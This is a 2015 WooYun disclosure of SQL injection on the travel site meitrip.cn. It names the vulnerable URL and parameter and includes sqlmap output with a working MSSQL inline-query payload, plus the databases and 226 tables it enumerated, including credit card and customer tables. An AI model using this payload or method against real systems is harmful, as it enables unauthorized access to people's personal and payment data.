当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095890

漏洞标题:美程旅行网存在SQL注入漏洞泄露大量用户敏感数据

相关厂商:美程旅行网

漏洞作者: 中央军

提交时间:2015-02-06 10:41

修复时间:2015-03-23 10:42

公开时间:2015-03-23 10:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

美程旅行网(www.meitrip.cn www.meitrip.com)成立于2003年,经过几年的发展,已经成本全国领先的在线旅游服务商。公司本着“专业品质,用心服务”的精神,为广大商务旅游的顾客提供可靠、安全、全面的旅游、商务服务。不仅为广大商旅客人解决了旅游住宿的各种烦扰,公司也得到了长足的发展,同时也取得了良好的社会效益和经济效益。 今后,美程旅行网将不断完善服务体系,提高业务水平,为广大商旅朋友提供更优质的酒店预定、打折机票及各种旅游资讯服务。

详细说明:

美程旅行网

http://www.meitrip.cn

存在SQL注入,出现问题的地方

http://www.meitrip.cn/private/GetGardenRoom.aspx?Hid=110602

Hid参数有问题。

<sqlmap identified the following injection points with a total of 69 HTTP(s) requests:
---
Place: GET
Parameter: Hid
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: Hid=(SELECT CHAR(113)+CHAR(106)+CHAR(115)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (9450=9450) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(119)+CHAR(119)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] master
[*] model
[*] msdb
[*] new_hotel
[*] new_hotel_old
[*] tempdb


new_hotel库:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: Hid
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: Hid=(SELECT CHAR(113)+CHAR(106)+CHAR(115)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (9450=9450) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(119)+CHAR(119)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: new_hotel
[226 tables]
+-------------------------------+
| AdminInfo                     |
| AdminOperateRecords           |
| Airport                       |
| Answers                       |
| ApplicationConfig             |
| Area                          |
| AsianGamesVenue               |
| BonusDetail                   |
| BonusType                     |
| CantonfairGuide               |
| CantonfairIntro               |
| CantonfairMaintype            |
| CantonfairMenuFirst           |
| CantonfairMenuSecond          |
| CantonfairMenuThird           |
| CantonfairNews                |
| CantonfairNewsType            |
| CantonfairSkill               |
| CantonfairStage               |
| CantonfairSubClass            |
| CantonfairSubType             |
| ChainBrands                   |
| ChainHotel                    |
| ChainInfo                     |
| ChainType                     |
| City                          |
| Commission                    |
| CommissionType                |
| Company                       |
| CompanyBank                   |
| ConfirmType                   |
| Country                       |
| Creditcard                    |
| CreditcardType                |
| CurrencyType                  |
| Customer                      |
| CustomerEnInfo                |
| CustomerLinkMan               |
| CustomerPoint                 |
| CustomerRating                |
| D99_Tmp                       |
| DestGuides                    |
| Destinations                  |
| EduHoetl                      |
| ElongGift                     |
| ElongRoomType                 |
| Employee                      |
| EnAnswers                     |
| EnExpoInfo                    |
| EnKeywords                    |
| EnNews                        |
| EnNewsComment                 |
| EnQuestions                   |
| ExpoInfo                      |
| Familymembers                 |
| FavoritesHotel                |
| Feedback                      |
| Feedbacktype                  |
| Financial                     |
| FriendlyLink                  |
| GZ365_viewQuestions           |
| GZ_viewQuestions              |
| GaranteeRules                 |
| GuangJiaoHui                  |
| HotSearchKey                  |
| HotelBonusComment             |
| HotelBonusPicture             |
| HotelBreakfastType            |
| HotelComment                  |
| HotelCommission               |
| HotelCommissionToCustomer     |
| HotelCoordinates              |
| HotelEnComment                |
| HotelInfo                     |
| HotelInfoSearchRanking        |
| HotelInfoSearchRankingHistory |
| HotelInfo_test2               |
| HotelInfotemp20140816         |
| HotelInstallationModel        |
| HotelLinkInfo                 |
| HotelLinkInfo20140816         |
| HotelNews                     |
| HotelOfficialLink             |
| HotelOfficialUrl              |
| HotelOfficialUrl_temp2        |
| HotelOfficialUrltemp20140823  |
| HotelPicture                  |
| HotelPricingByDate            |
| HotelPromotions               |
| HotelStar                     |
| HotelStaticUrl                |
| HotelTel                      |
| Information                   |
| InformationComment            |
| InformationType               |
| InformationView               |
| Keywords                      |
| LandMarkType                  |
| LandMarks                     |
| MarketingStaff                |
| MemberCard                    |
| MenuList                      |
| MenuPermission                |
| MetroExit                     |
| MetroInfo                     |
| ModelBedType                  |
| ModelBreakfast                |
| ModelBroadband                |
| ModelCreditCard               |
| ModelDining                   |
| ModelLeisure                  |
| ModelMeeting                  |
| ModelRoomEquip                |
| ModelServices                 |
| News                          |
| NewsComment                   |
| NewsOfAdmin                   |
| NewsOfHotel                   |
| NewsType                      |
| NightlyRate                   |
| Offer_News                    |
| OfficalSimpOrder              |
| OftenPeople                   |
| OftenPeopleType               |
| OrderConfirm                  |
| OrderDetailsInfo              |
| OrderDetailsInfoTemp20140830  |
| OrderInfo                     |
| OrderInfoTemp                 |
| OrderInfoTemp2                |
| OrderInfoTemp20140830         |
| OrderInfo_temp3               |
| OrderOperateRecords           |
| OrderPayType                  |
| OrderState                    |
| OrderTel                      |
| OrderType                     |
| Order_Mark                    |
| OrderpayState                 |
| PaperType                     |
| Partener                      |
| PayType                       |
| PromoCode                     |
| ProvderSetCommission          |
| Provider                      |
| ProviderCommission            |
| Province                      |
| QuestionType                  |
| Questions                     |
| Room                          |
| RoomBonusByDate               |
| RoomFullHouse                 |
| RoomPicture                   |
| RoomPricingTypeByDate         |
| RoomTypeImage                 |
| Room_Yuprice                  |
| Room_YupriceByDate            |
| SendMailTemplet               |
| SendMialSys                   |
| Sight                         |
| Station                       |
| Street                        |
| SystemConfig                  |
| TempHotelInfo                 |
| TrafficLocation               |
| TreatmentState                |
| UpsetInfo                     |
| UsualHotel                    |
| VIEWHot_Hotel                 |
| View365Comment                |
| View365PicBounds              |
| ViewArea                      |
| ViewBonusHotelList            |
| ViewEnCantonFair              |
| ViewEnComment                 |
| ViewEnExpos                   |
| ViewEnHotelSearch             |
| ViewEnMyOrders                |
| ViewEnNews                    |
| ViewEnQuestions               |
| ViewHotelSearch               |
| ViewHotelSearchInWinForm      |
| ViewLandMarkHotel             |
| ViewMetor                     |
| ViewPromotions                |
| ViewProvince                  |
| ViewStreet                    |
| View_Chain_Hotel              |
| WebSiteInfo                   |
| Withdraw                      |
| Withdrawstatus                |
| Workexperience                |
| ZjType                        |
| comd_list                     |
| coocoodorder                  |
| dtproperties                  |
| duizhang                      |
| duizhangType                  |
| hotelinfotemp20140823         |
| jiesuanType                   |
| pangolin_test_table           |
| tb_link                       |
| tempHave                      |
| tempNo                        |
| temporderinfo20140920         |
| test                          |
| test2_HotelLinkInfo           |
| test3_HotelLinkInfo           |
| test_HotelLinkInfo            |
| test_hotelinfo                |
| view365DisplayComment         |
| viewCantonFair                |
| viewCantonfairNews            |
| viewChainHotel                |
| viewCityAriport               |
| viewCityStation               |
| viewComment                   |
| viewEduHotel                  |
| viewExpos                     |
| viewHotelComment              |
| viewHotelEnComment            |
| viewMyOrders                  |
| viewMyPoint                   |
| viewNewHotels                 |
| viewNews                      |
| viewQuestions                 |
+-------------------------------+


选OrderInfo 表中的某些字段来看看吧,好几万信息:

1.jpg

漏洞证明:

修复方案:

版权声明:转载请注明来源 中央军@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝